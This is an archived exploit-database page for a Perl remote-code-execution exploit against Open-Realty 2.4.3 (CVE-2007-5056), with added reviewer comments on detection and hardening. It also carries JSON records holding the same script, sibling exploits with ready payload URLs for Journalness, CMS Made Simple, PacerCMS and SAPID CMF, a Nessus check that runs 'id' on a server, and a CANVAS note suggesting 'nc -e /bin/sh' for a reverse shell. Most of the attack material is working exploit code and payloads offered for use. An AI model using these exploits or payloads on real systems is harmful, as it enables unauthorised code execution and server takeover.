ID EDB-ID:5090
Type exploitdb
Reporter Iron
Modified 2008-02-09T00:00:00
Description
Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit. CVE-2007-5056. Webapps exploit for php platform
#!/usr/bin/perl
#
# Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
# Reviewer summary (defensive reading of this archived proof of concept):
#   - Interactive script: reads a base URL and a PHP snippet from stdin, sends
#     ONE HTTP GET, and prints the response body.
#   - The request goes to include/class/adodb/adodb-perf-module.inc.php with the
#     snippet carried in the last_module query parameter. This is the ADOdb Lite
#     eval injection tracked as CVE-2007-5056 (CWE-94 per the scanner entry on
#     this page).
#   - Precondition stated by the author: register_globals = On in php.ini. With
#     it Off, the query parameter is presumably not promoted to $last_module.
#   - Log signature: any request for adodb-perf-module.inc.php that carries a
#     last_module parameter. The file looks like an include, not a page meant to
#     be requested directly -- confirm against the deployed application.
#   - Hardening that follows from the above: keep register_globals Off, deny
#     direct web access to the bundled ADOdb Lite include directory, and move
#     off ADOdb Lite 1.42 and earlier (the range the CVE text names).
# LWP::UserAgent is the only dependency; it is loaded at run time via require.
require LWP::UserAgent;
# Banner and first prompt. The '#' lines below are inside the string literal
# and are printed as-is; they are not Perl comments.
print "#
# Open-Realty <= 2.4.3 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/openrealtydir/
Target url?";
# Read the base URL of the installation from stdin (trailing newline removed).
chomp($target=<stdin>);
# Prepend a scheme when the input does not already start with "http://".
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
# Ensure a trailing slash so the relative path appended below joins cleanly.
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
# Read the PHP snippet from stdin.
chomp($code=<stdin>);
# Remove PHP open/close tags ("<?php", "?>", "<?"), case-insensitively and
# globally; the snippet is placed inside an eval() string, not a PHP file.
$code =~ s/(<\?php|\?>|<\?)//ig;
# Build the request URL. The fixed "t{}; class t{};" prefix and the trailing
# "//" wrap the snippet; judging by the eval() line quoted in the related
# advisories on this page, they close the generated class declaration and
# comment out the remainder of the evaluated string.
# The snippet is concatenated without URL-encoding.
$target .= "include/class/adodb/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";
# HTTP client: 10-second timeout, proxy settings taken from the environment.
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
# Single GET request; no cookies or authentication are set by this script.
$response = $ua->get($target);
# is_success reflects only the HTTP status class (2xx); it does not by itself
# show that the snippet was evaluated on the server.
if ($response->is_success)
{
# Print the raw response body between two rules of 20 '#' characters.
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
# Any non-2xx result aborts with the HTTP status line.
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
{"id": "EDB-ID:5090", "hash": "21e8a525942168f2d2e999eff3b29198", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Open-Realty <= 2.4.3 last_module Remote Code Execution Exploit", "description": "Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit. CVE-2007-5056. Webapps exploit for php platform", "published": "2008-02-09T00:00:00", "modified": "2008-02-09T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5090/", "reporter": "Iron", "references": [], "cvelist": ["CVE-2007-5056"], "lastseen": "2016-01-31T21:33:25", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5056"]}, {"type": "exploitdb", "idList": ["EDB-ID:5097", "EDB-ID:5098", "EDB-ID:5091", "EDB-ID:4442"]}, {"type": "nessus", "idList": ["ADODB_LITE_LAST_MODULE_CMD_EXEC.NASL"]}, {"type": "canvas", "idList": ["CMSMADESIMPLE_EVAL", "PACERCMS_EXEC", "OPENREALTY_EXEC"]}], "modified": "2016-01-31T21:33:25"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5090/", "sourceData": "#!/usr/bin/perl\n#\n#\tVendor url: www.open-realty.org\n#\n# note: exploit requires Register_globals = On in php.ini\n#\t\t\t\t\t\t\t~Iron\n#\t\t\t\t\t\t\thttp://www.randombase.com\nrequire LWP::UserAgent;\n\nprint \"#\n# Open-Realty <= 2.4.3 Remote Code Execution exploit\n# By Iron - randombase.com\n# Greets to everyone at RootShell Security Group\n#\n# Example target url: http://www.target.com/openrealtydir/\nTarget url?\";\nchomp($target=<stdin>);\nif($target !~ /^http:\\/\\//)\n{\n\t$target = \"http://\".$target;\n}\nif($target !~ /\\/$/)\n{\n\t$target .= \"/\";\n}\nprint \"PHP code to evaluate? 
\";\nchomp($code=<stdin>);\n$code =~ s/(<\\?php|\\?>|<\\?)//ig;\n$target .= \"include/class/adodb/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};\".$code.\"//\";\n\n$ua = LWP::UserAgent->new;\n$ua->timeout(10);\n$ua->env_proxy;\n\n$response = $ua->get($target);\n\nif ($response->is_success)\n{\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n\tprint $response->content;\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n}\nelse\n{\n die \"Error: \".$response->status_line;\n}\n\n# milw0rm.com [2008-02-09]\n", "osvdbidlist": ["40596"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:32", "bulletinFamily": "NVD", "description": "Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote attackers to execute arbitrary code via PHP sequences in the last_module parameter.", "modified": "2017-09-28T21:29:28", "published": "2007-09-24T18:17:00", "id": "CVE-2007-5056", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5056", "title": "CVE-2007-5056", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:56:06", "bulletinFamily": "exploit", "description": "CMS Made Simple 1.2 Remote Code Execution Vulnerability. CVE-2007-5056. Webapps exploit for php platform", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "EDB-ID:4442", "href": "https://www.exploit-db.com/exploits/4442/", "type": "exploitdb", "title": "CMS Made Simple 1.2 - Remote Code Execution Vulnerability", "sourceData": "# o [bug] /\"*._ _ #\n# . . . .-*'` `*-.._.-'/ #\n# o o < * )) , ( #\n# . o `*-._`._(__.--*\"`.\\ #\n# #\n# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #\n# author: irk4z@yahoo.pl #\n# download: #\n# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #\n# dork: \"powered by CMS Made Simple version 1.1.2\" #\n# greetz: cOndemned, kacper, str0ke #\n\n# code:\n\n/lib/adodb_lite/adodb-perf-module.inc.php:\n...\n eval('class perfmon_parent_EXTENDER extends ' . $last_module . 
'_ADOConnection { }');\n...\n\n# exploit:\n\n http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();\n http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]\n\n# milw0rm.com [2007-09-21]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4442/"}, {"lastseen": "2016-01-31T22:33:31", "bulletinFamily": "exploit", "description": "Journalness <= 4.1 (last_module) Remote Code Execution exploit. CVE-2007-5056. Webapps exploit for php platform", "modified": "2008-02-09T00:00:00", "published": "2008-02-09T00:00:00", "id": "EDB-ID:5091", "href": "https://www.exploit-db.com/exploits/5091/", "type": "exploitdb", "title": "Journalness <= 4.1 last_module Remote Code Execution Exploit", "sourceData": "#!/usr/bin/perl\n#\n#\tVendor url: journalness.sourceforge.net\n#\n# note: exploit requires Register_globals = On in php.ini\n#\t\t\t\t\t\t\t~Iron\n#\t\t\t\t\t\t\thttp://www.randombase.com\nrequire LWP::UserAgent;\n\nprint \"#\n# Journalness <= 4.1 Remote Code Execution exploit\n# By Iron - randombase.com\n# Greets to everyone at RootShell Security Group & dHack\n#\n# Example target url: http://www.target.com/journalnessdir/\nTarget url?\";\nchomp($target=<stdin>);\nif($target !~ /^http:\\/\\//)\n{\n\t$target = \"http://\".$target;\n}\nif($target !~ /\\/$/)\n{\n\t$target .= \"/\";\n}\nprint \"PHP code to evaluate? 
\";\nchomp($code=<stdin>);\n$code =~ s/(<\\?php|\\?>|<\\?)//ig;\n$target .= \"includes/database/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};\".$code.\"//\";\n\n$ua = LWP::UserAgent->new;\n$ua->timeout(10);\n$ua->env_proxy;\n\n$response = $ua->get($target);\n\nif ($response->is_success)\n{\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n\tprint $response->content;\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n}\nelse\n{\n die \"Error: \".$response->status_line;\n}\n\n# milw0rm.com [2008-02-09]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5091/"}, {"lastseen": "2016-01-31T21:34:28", "bulletinFamily": "exploit", "description": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability. CVE-2007-5056. Webapps exploit for php platform", "modified": "2008-02-10T00:00:00", "published": "2008-02-10T00:00:00", "id": "EDB-ID:5098", "href": "https://www.exploit-db.com/exploits/5098/", "type": "exploitdb", "title": "PacerCMS 0.6 last_module Remote Code Execution Vulnerability", "sourceData": "### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability\n### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip\n### Dork : Powered by PacerCMS\n### POC :\n### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//\n### OR INCLUDE SHELL\n### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//\n### I'm TrYaGi ......:)\n\n# milw0rm.com [2008-02-10]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5098/"}, {"lastseen": "2016-01-31T22:34:05", "bulletinFamily": "exploit", "description": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability. CVE-2007-5056. 
Webapps exploit for php platform", "modified": "2008-02-10T00:00:00", "published": "2008-02-10T00:00:00", "id": "EDB-ID:5097", "href": "https://www.exploit-db.com/exploits/5097/", "type": "exploitdb", "title": "SAPID CMF Build 87 last_module Remote Code Execution Vulnerability", "sourceData": "### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability\n### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip\n### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip\n### Dork : Powered by SAPID CMF Build 87\n### Vuln :\n### 09: */\n\neval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');\n### POC :\n### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//\n### OR INCLUDE SHELL\n### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//\n### I'm TrYaGi ......:)\n\n# milw0rm.com [2008-02-10]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5097/"}], "nessus": [{"lastseen": "2019-01-16T20:07:28", "bulletinFamily": "scanner", "description": "ADOdb Lite, a lightweight database framework for PHP applications, is\ninstalled on the remote host. \n\nThe version of ADOdb Lite on the remote host fails to sanitize input\nto the 'last_module' parameter of the 'adodb-perf-module.inc.php'\nscript before using it in an 'eval()' statement to evaluate PHP code. 
\nAn unauthenticated attacker can leverage this issue to execute\narbitrary code on the remote host subject to the privileges of the web\nserver user id.", "modified": "2018-11-15T00:00:00", "published": "2007-09-24T00:00:00", "id": "ADODB_LITE_LAST_MODULE_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=26072", "title": "ADOdb Lite adodb-perf-module.inc.php last_module Parameter Arbitrary Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26072);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2007-5056\");\n script_bugtraq_id(25768, 25997);\n script_xref(name:\"EDB-ID\", value:\"4442\");\n\n script_name(english:\"ADOdb Lite adodb-perf-module.inc.php last_module Parameter Arbitrary Code Execution\");\n script_summary(english:\"Tries to run a command via ADOdb Lite's adodb-perf-module.inc.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI script that allows arbitrary\ncommand execution.\" );\n script_set_attribute(attribute:\"description\", value:\n\"ADOdb Lite, a lightweight database framework for PHP applications, is\ninstalled on the remote host. \n\nThe version of ADOdb Lite on the remote host fails to sanitize input\nto the 'last_module' parameter of the 'adodb-perf-module.inc.php'\nscript before using it in an 'eval()' statement to evaluate PHP code. 
\nAn unauthenticated attacker can leverage this issue to execute\narbitrary code on the remote host subject to the privileges of the web\nserver user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/481984/100/0/threaded\" );\n # http://web.archive.org/web/20071011195544/http://blog.cmsmadesimple.org/2007/10/07/announcing-cms-made-simple-1141/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6906a13e\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/09/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"pafiledb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80);\n\n# Generate a list of extra paths to check.\nextra_dirs = make_array();\nndirs = 0;\n# - CMS Made Simple\nforeach dir (cgi_dirs())\n{\n extra_dirs[ndirs++] = string(dir, 
\"/lib/adodb_lite\");\n}\nif (thorough_tests)\n{\n foreach dir (make_list(\"/cms\"))\n extra_dirs[ndirs++] = string(dir, \"/lib/adodb_lite\");\n}\n# - paFileDB.\ninstall = get_kb_item(string(\"www/\", port, \"/pafiledb\"));\nif (install)\n{\n matches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\n if (!isnull(matches))\n {\n dir = matches[2];\n extra_dirs[ndirs++] = string(dir, \"/includes/adodb\");\n }\n}\n\n\n# Try to exploit the issue to run a command.\ncmd = \"id\";\nexploit = string(\n \"zZz_ADOConnection{}system(\", cmd, \");class zZz_ADOConnection{}//\"\n);\n\nhttp_check_remote_code(\n extra_dirs : extra_dirs,\n check_request : string(\"/adodb-perf-module.inc.php?last_module=\", urlencode(str:exploit)),\n check_result : \"uid=[0-9]+.*gid=[0-9]+.*\",\n command : cmd,\n port : port,\n warning : TRUE\n);\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:14:09", "bulletinFamily": "exploit", "description": "**Name**| openrealty_exec \n---|--- \n**CVE**| CVE-2007-5056 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Open-Realty <= 2.4.3 Remote Code Execution \n**Notes**| CVE Name: CVE-2007-5056 \nVENDOR: Open-realty.org \nRepeatability: Infinite \nReferences: http://securityreason.com/exploitalert/3360 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5056 \nCVSS: 6.8 \n\n", "modified": "2007-09-24T18:17:00", "published": "2007-09-24T18:17:00", "id": "OPENREALTY_EXEC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/openrealty_exec", "type": "canvas", "title": "Immunity Canvas: OPENREALTY_EXEC", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-25T14:13:21", "bulletinFamily": "exploit", "description": "**Name**| pacercms_exec \n---|--- \n**CVE**| CVE-2007-5056 \n**Exploit Pack**| 
[CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| PacerCMS 0.6 Remote Code Execution \n**Notes**| CVE Name: CVE-2007-5056 \nVENDOR: PacerCMS \nRepeatability: Infinite \nReferences: http://secunia.com/advisories/28859/ \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5056 \nCVSS: 6.8 \n\n", "modified": "2007-09-24T18:17:00", "published": "2007-09-24T18:17:00", "id": "PACERCMS_EXEC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/pacercms_exec", "type": "canvas", "title": "Immunity Canvas: PACERCMS_EXEC", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-25T14:13:34", "bulletinFamily": "exploit", "description": "**Name**| cmsmadesimple_eval \n---|--- \n**CVE**| CVE-2007-5056 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CMS Made Simple Eval \n**Notes**| CVE Name: CVE-2007-5056 \nVENDOR: cms made simple \nNotes: Try using nc -e /bin/sh as your command and having a nc -vlp \nRepeatability: Infinite \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5056 \nCVSS: 6.8 \n\n", "modified": "2007-09-24T18:17:00", "published": "2007-09-24T18:17:00", "id": "CMSMADESIMPLE_EVAL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/cmsmadesimple_eval", "type": "canvas", "title": "Immunity Canvas: CMSMADESIMPLE_EVAL", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}